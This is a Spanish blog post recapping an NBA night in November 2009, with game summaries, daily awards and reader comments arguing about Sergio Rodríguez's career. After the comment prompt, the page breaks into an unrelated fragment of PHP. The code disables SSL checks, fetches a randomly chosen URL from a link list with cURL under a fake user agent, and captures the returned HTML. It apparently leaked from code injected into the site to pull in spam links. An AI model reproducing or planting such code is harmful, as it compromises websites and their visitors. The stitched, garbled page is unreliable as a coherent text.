La Crónica (04/11/2009)

05 de November de 2009 por txusma

Trepidante jornada con dos prórrogas y varios partidos resueltos en el filo de la navaja.

Por fin alguien les hizo conocer el miedo a los Celtics. Quien menos podíamos esperar: los Wolves liderados (toma ya) por Oleksiy Pecherov. Los verdes fueron todo el partido a remolque pero no cabe duda de que saben sufrir. De no haber sido por tanta pérdida, los locales habrían roto la racha. De hecho, en la última jugada para empatar Flynn perdió un balón polémico en una acción que bien podría haber sido falta.

Los Lakers por su parte, back to back con OT to OT. Toma y daca espectacular en Houston, que se llevó el de casi siempre. A veces nos olvidamos de quién es “The Black Mamba”. Golpe de autoridad en una cancha que puede volver a ser muy difícil y con la vuelta de Gasol a la vista. Los reservas, sin embargo, siguen sin carburar demasiado. No todo pueden ser buenas noticias.

En New Orleans Paul le daba su tradicional baño a Jason Kidd. Estuvo increíble, como es habitual, pero aún con el peor partido de Nowtizki que se recuerda, los locales ganaron en la prórroga y de milagro. Gracias a Terry y a Dampier (sí, lo habéis oído bien) los Mavs tuvieron la victoria en su mano, pero un inoportuno error en un tiro libre de Barea cuando ganaban de 3 y el único triple de Stojakovic en todo el partido (1-8 el crack) lograron el milagro en el tiempo reglamentario. Después ya no hubo color.

Otros duelos con altas dosis de emoción fueron el WizardsHeat, donde a pesar de la primera actuación sobrehumana de Wade este curso, el equipo de Arenas tuvo la victoria en su mano y fallaron, y también el KnicksPacers en el Madison, donde los locales se desinflaron en el último cuarto cuando habían ido ganando todo el partido.

Para no alargarnos, los Magic rompieron la imbatibilidad de los Suns, los Warriors se estrenaron frente a los “osetes”, los Nuggets no tuvieron problemas con los Nets, como tampoco los Hawks con los Kings y los Raptors ganaron a los Pistons.

PREMIOS

MVP: Compartido para 3 jugadores que suenan como candidatos al título de MVP de la temporada. Dwyane Wade (40-4-5), Kobe Bryant (41-6-4) y Chris Paul (39-5-7). La calidad marca la diferencia.

Rookie: Hoy es de esos días que no hay ningún tipo de discusión. Los 23 puntos con 9 de 11 en tiros de campo de Ty Lawson bien se merecen el premio de rookie del día. No hay que quitarle el ojo de encima a este hombre que encima está aprendiendo al lado del gran Chauncey Billups.

Sorpresa: Muchísimas esta jornada. Ryan Anderson (20-10), que será la última vez que lo incluyamos aquí por el buen inicio de campaña que está protagonizando; Quentin Richardon (19-9), al que parece no habérsele olvidado jugar a baloncesto aunque no lo quieran en ninguna parte; Dahntay Jones (19-12), ganándose un puesto de titular en Indiana; Roy Hibbert (15-14), afianzado como pívot titular del equipo; Oleksiy Pecherov (24-8), rindiendo mejor que el mismo Al Jefferson; Bobby Brown (18), sintiéndose importante en los Hornets; Anthony Morrow (24), en sólo 12 lanzamientos; y finalmente Allen Iverson (18-3-7), cuajando una buena actuación saliendo desde el banquillo.

Decepción: Trevor Ariza tan solo fue capaz de convertir 5 de 21 lanzamientos en su partido contra los Lakers. Seguro que le pudo la ansiedad. Peor lo hizo la pareja Jason Richardson-Grant Hill, incapaz de anotar un solo tiro en todo el partido.

Esfuerzo en vano: Ben Gordon, Gilbert Arenas, Kevin Martin, Rudy Gay, Jason Terry… Todos anotaron 29 o más puntos pero no vieron recompensados sus esfuerzos. Más de uno debería irse acostumbrando.

RAZONES PARA TRASNOCHAR

La madrugada del jueves al viernes nos ofrece, como es costumbre, un double-header de lo más interesante. A las 2h00, los Bulls esperan poner a prueba a los Cavs en lo que fácilmente podría ser una eliminatoria de los Playoffs 2010. Y a continuación, a partir de las 4h30, otro partido con sabor a postseason: Parker contra Deron, Duncan contra Boozer, Popovic contra Sloan, o lo que es lo mismo, San Antonio Spurs contra Utah Jazz.

Comenta

20 comentarios a esta entrada

  1. L.Casei dice:
    #1

    En algunas páginas hablan de Marc para el All-Star… un poquito demasiado…
    Y Sergio, de nuevo inédito, ni un segundo… Para que digan que McMillan confiaba poco en él… demasiado jugaba para el rendimiento que daba… Demasiado poco en defensa, tiro y lo que es peor, atrevimiento…

      Citar

  2. TheDeerHunter dice:
    #2

    Es verdad… porque mira qué bien juegan ahora los bases de McMillan desde que se desprendió de Sergio como él quería. Y Portland subiendo como un cohete, vamos….

    Es lamentable la situación de Sergio en Sacramento, pero todo este tema es efímero y circunstancial. Me recuerda lo que le pasó a Iván de la Peña en su día. Llegará el día en que alguien encuentre valor en las virtudes de Sergio (que son muchas) y contribuya a mitigar sus defectos. Quizás no será en la NBA, pero yo sigo pensando que es bastante mejor jugador que muchos bases de esta liga… y algunos matarían por haber logrado lo que él ya ha logrado.

    Por cierto, la diferencia con respecto a este tema entre Westphal y McMillan es la coherencia. A mí me parece perfectamente respetable que Westphal prefiera a Tyreke y Udrih antes que a Sergio… lo que nunca entenderé de McMillan y no me parece respetable es su capacidad para marear al chaval durante todos estos años en Portland. Con Sergio o sin Sergio… no gastaría un céntimo por ver jugar a un equipo de McMillan. Menudo coñazo de tipo.

      Citar

  3. sergio dice:
    #3

    Estoy con L.Casei, Sergio actualmente es un jugador mas idoneo para el baloncesto FIBA que para el NBA. Le falta fisico, regularidad en el tiro, desplazamientos laterales en defensa y atrevimiento para atacar la canasta. En la NBA con las grandes zonas que hay un base debe hacer todo eso si quiere ayudar a su equipo. El que tenga gran vision de juego para ver las posiciones ventajosas de sus compañeros no quiere decir que sea un gran base. Hay que leer mejor el juego antes de repartir el balon (Billups no necesita hacer 8-9 asistencias para hacer jugar a su equipo) y aprender las defensas de los rivales, tener menos perdidas…..

    Hace tiempo que me fijo en que Calderon pasa los bloqueos muy lejos, dando espacios al contrincante. Eso facilita enormemente el tiro y el primer paso para entrar a canasta. Debe tener cuidado.

    Yo tampoco veo a Marc en el All-Star pero si sigue con estos numeros y con la baja competitividad de pivots que hay en el Oeste no lo veo tan descabellado….

      Citar

  4. sergio dice:
    #4

    Si un jugador tiene que volver a europa, y si es para triunfar (vease Navarro), no lo veo tan mala idea.

      Citar

  5. Love Denise dice:
    #5

    respecto al tema sergio rodriguez, siempre me hago una pregunta ¿qué hizo Sergio en Europa antes de irse a la NBA? ¿qué ganó? ¿en que equipos jugo? Sergio era un jugador normal, del monton, que jugaba en un equipo de tabla media como el estu, de vez en cuando daba un pase espectacular y ya él y la prensa creian que era el nuevo Nash, le metieron pajaros en la cabeza, y asi va, todavia viviendo de aquellos 2 triples que le metio a Argentina en semis del mundial ’06, y de su MVP en el Europeo sub 19 o 20, (no es lo mismo jugar con los de tu edad, que en una liga con gente curtuda en 1000 batallas). Desde entonces, Sergio no ha hecho absolutamente nada, ha tenido algunas oportunidades en Portland (creo recordar una temporada que jugaba como 20 minutos los ultimos 10-15 partidos), y lo desaprovecho gracias a su nula defensa, su pauperrimo tiro exterior, su facilidad para perder balones en 5 minutos, su cobardia a la hora de penetrar, y el saber que ser un buen base es algo mas que dar de vez en cuando un pase por la espalda. Y ahora esta pagando el error de irse tan pronto a EEUU en vez de intentar quedarse en Europa y fichar por un equipo superior y ganar mas experiencia. Ojala me equivoque, pero el año que viene a lo mejor esta otra vez en el estu.

    En cuanto a Calderon, si no conocieramos su profesionalidad, estariamos hablando de otro caso mas de jugador que renueva por un paston y a partir de ahi, se deja llevar. Esta muy flojo, todo lo contrario que Marc.

      Citar

  6. Love Denise dice:
    #6

    si algioen tiene curiosidad, aqui pongo las estadisticas de sergio rodriguez antes de irese a EEUU

    2005 -2006

    Mtos: 23,5
    Ptos: 9
    t1: 68% t2: 51% t3: 31%
    rbtes: 2,4 asist: 4,9 balones perdidos: 3,05, recuperados: 1, 2 tapones recibidos: 14

    valoracion: 9, 4

      Citar

  7. Love Denise dice:
    #7

    rebotes: 2,4
    aistencias: 4,9
    balon perdidos: 3,05
    recuperados: 1,2
    valoracion: 9, 4

      Citar

  8. TheDeerHunter dice:
    #8

    Bueno, Love… hay muchos que no hicieron nada antes de llegar a la NBA, más bien la mayoría. Cuando él habla de eso siempre dice que hay oportunidades que sólo pasan una vez en la vida… y estoy completamente de acuerdo con eso.
    ¿que se equivocó?? cada decisión en la vida supone un riesgo. Siempre.

    Se puede hacer la lectura de que ha desaprovechado todas las oportunidades en Portland y también se puede hacer la lectura de que las oportunidades que ha tenido no han sido las más adecuadas. No será el único caso el de Sergio en ese equipo. McMillan es un entrenador completamente miope a la hora de sacar partido a las cualidades de una plantilla. Miope y cerril con una idea monolítica.

    De las cualidades y defectos de Sergio… no creo que se puedan evaluar objetivamente en sus circunstancias y si vuelve a Europa para demostrar lo que él es a todo el mundo a mí me parecerá también perfecto.

      Citar

  9. Viva_Dirk dice:
    #9

    Sergio antes de irse hizo unos play-offs espectaculares y ya era el 2º base de España, que fue campeona del mundo. Sus números en aquellos play-offs fueron de 18.6 puntos, 5.3 asistencias, 1.6 balones perdidos y 1.6 balones recuperados, 17 de 31 en tiros de 2 y 7 de 10 en triples.

    Eso y su trayectoria con la selección le hicieron decidirse. Para mi es mucho mejor intentarlo que quedarte en Europa. Y no creo que su carrera NBA halla terminado, en cuanto se lesione Kevin Martin deberia jugar buenos minutos.

    Pau Gasol antes de irse a la NBA hizo 11 puntos, 5 rebotes y 14.5 de valoración, y desde luego no tenia la experiencia internacional que tenia Sergio.

      Citar

  10. kantonyo dice:
    #10

    Cuantos años tiene Sergio Rodriguez?? Yo creo que a veces nos olvidamos de ese pequeño detalle…

      Citar

  11. sergio dice:
    #11

    Nadie se ha dado cuenta de que hoy tambien se ha batido un record historico???

    Fisher es el unico jugador de la historia que ha jugado mas de 30 minutos y no ha producido ni puntos ni rebotes ni asistencias… ayer contra Houston.

      Citar

  12. aro_pasado_no_newtoniano dice:
    #12

    Hizo unos playoffs espectaculares,,que duraron la escalofriante cifra de 3 partidos en los que unicaja barrió a Estudiantes.

    Estarás forrado, Sergio y sabrás un inglés para mearte en los anuncios de Home English,,,,pero ¿en que vuelo perdiste la maleta de la magia?

      Citar

  13. Love Denise dice:
    #13

    totalmente de acuerdo con aro no newtoniano.

    @dirk: en cuanto lo de gasol, creo recordar que hizo una tremenda copa del rey que le sirvio, ademas de para ganarla, para ser mvp, despues unos increibles playoffs, y un sensacional eurobasket en turquia.
    ademas, no es el mismo caso que sergio, fue un nº3 de draft y saliendo tan alto en la loteria, uno no se puede quedar en europa.

    deerhunter: “”hay muchos que no hicieron nada antes de llegar a la NBA, más bien la mayoría””.

    la mayoria de los que no hicieron nada en europa, estan en similar situacion a la de sergio, es decir, agitando toallas. por ejemplo, los demas españoles que se fueron, todos estaban ya consagrados en europa, ganando titulos nacionales, e internacionales. En verdad yo envidio a sergio. ¡¡ ya me gustaria a mi cobrar 1 millon de dolares por trabajar 10 minutos a la semana.

    De todas formas, respeto vuestras opiniones, cada uno tiene un punto de vista distinto. Saludos

      Citar

  14. kantonyo dice:
    #14

    Pues parece que se ha lesionado Kevin Martin….. esto puede hacer que Tyreke juegue en su posición natural y que Beno y Sergio disputen más minutos…. Puede ser una nueva posibilidad para el canario… Por cierto una pena para Sacramento, Kevin había empezado bastante bien la temporada, pero este chico es de cristal…

      Citar

  15. Love Denise dice:
    #15

    supongo que evans jugara de 2, udrih jugara unos 30 minutos y sergio unos 20 mas o menos. Ahora tiene una oportunidad, si no la aprovecha, ya no tendra excusas

      Citar

  16. TheDeerHunter dice:
    #16

    Denise, dime lo que hizo Nowitzki antes de ir a la NBA, o Parker, o Stojakovic… y un largo etc.
    Lo siento, pero no veo una relación directa entre contar con una trayectoria en Europa (que entre otras cosas los americanos se pasan por el forro la trayectoria) y triunfar en la NBA.

      Citar

  17. kantonyo dice:
    #17

    Un claro ejemplo de que no hayan hecho nada en Europa es Brandon Jennings, pasó con más pena que gloria por Roma, y miren ahora como ha empezado la temporada…

    Mi opinión es que Sergio hizo lo correcto marchandose a USA cuando tuvo la oportunidad, nunca se le puede criticar a una persona por dar un paso atrevido en su vida, totalmente contrario a Vazquez, Dueñas o incluso Herreros … Sergio tiene todavia 10 años de baloncesto a gran nivel y ya tendrá tiempo de volver a Europa y demostrar quien es, ahora lo que tiene que hacer es darlo todo, echarle huevos, quitarse el miedo de encima y jugarse 10-15 tiros por partido, como hace Brandon Jennings, y si te sale mal, que se venga para Europa, que equipos no le van a faltar, pero ante todo intentarlo con caracter y determinación …

      Citar

  18. Love Denise dice:
    #18

    lo de parker y nowitzki son raras excepciones, dije la mayoría, no todos, de todas formas, solo es mi opinion. Yo creo que sergio no debio irse tan pronto, el que sí debió irse fue Vázquez, ése si que se cagó.

    Lo de jennings, supongo que triunfa por el tipo de juego, quizas jennings en estático y en un juego más lento, con mucahs ayudas y sin tantos espacios, no sabe jugar, quizás por juventud, no sé, su caso es un tanto extraño. Saludos.

      Citar

  19. TheDeerHunter dice:
    #19

    Yo creo que el único factor con el que está directamente relacionado lo que uno haya conseguido en europa es la elección en el draft. Creo que podríamos encontrar tantos ejemplos de jugadores que lo habían demostrado todo en Europa y no les dieron bola allí como al contrario.

    A la hora de valorar ese factor el problema lo tiene la franquicia, que decide libremente invertir una elección en el draft en uno u otro jugador. De hecho, en ese tipo de elecciones se suele valorar mucho más la proyección que la experiencia que se tenga.
    Y a partir de ahí, lo mismo… creo que la franquicia debería de saber lo que quiere cuando ficha a un jugador. ¿Porqué estamos siempre criticando a Sergio? Pritchard lo quería y McMillan no… es que los Blazers no saben el modelo que quieren implantar en la franquicia. Ese es el problema de todo.

    Al final, perdida la magia o no (que eso está por ver) Sergio efectivamente ha luchado por su sueño y ha disfrutado de una experiencia única, ganando un pastizal de paso que ya veríamos si hubiera ganado aquí. Otros han tenido que ir a la NBA pagando.

      Citar

  20. Kiki dice:
    #20

    Muchas veces los GM cuando eligen en el Draft y miran a Europa buscan simplemente potencial, talento por explotar o jugadores con unas características muy determinadas, que no abunden en el baloncesto estadounidense.
    Eso es exactamente lo que le pasó a Sergio Rodríguez: un jugador que empezó a explotar con 18/19 años, con buena visión, manejo, velocidad mental, improvisación y sobre todo capacidad de cambiar el ritmo o dinámica de un partido. El problema es que tres años después seguía siendo el mismo jugador que llegó a los Blazers, sin progresar de verdad en lo que necesitaba : más físico, mejor defensa, agresividad y tiro de media y larga distancia. Por eso perdieron la confianza en él en Portland, con razón.
    Pero yo no descarto que, si finalmente encuentra sus 20 minutos por partido en Sacramento, pueda ser un jugador NBA para bastantes años. De él depende. El primer convencido ha de ser el propio Sergio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>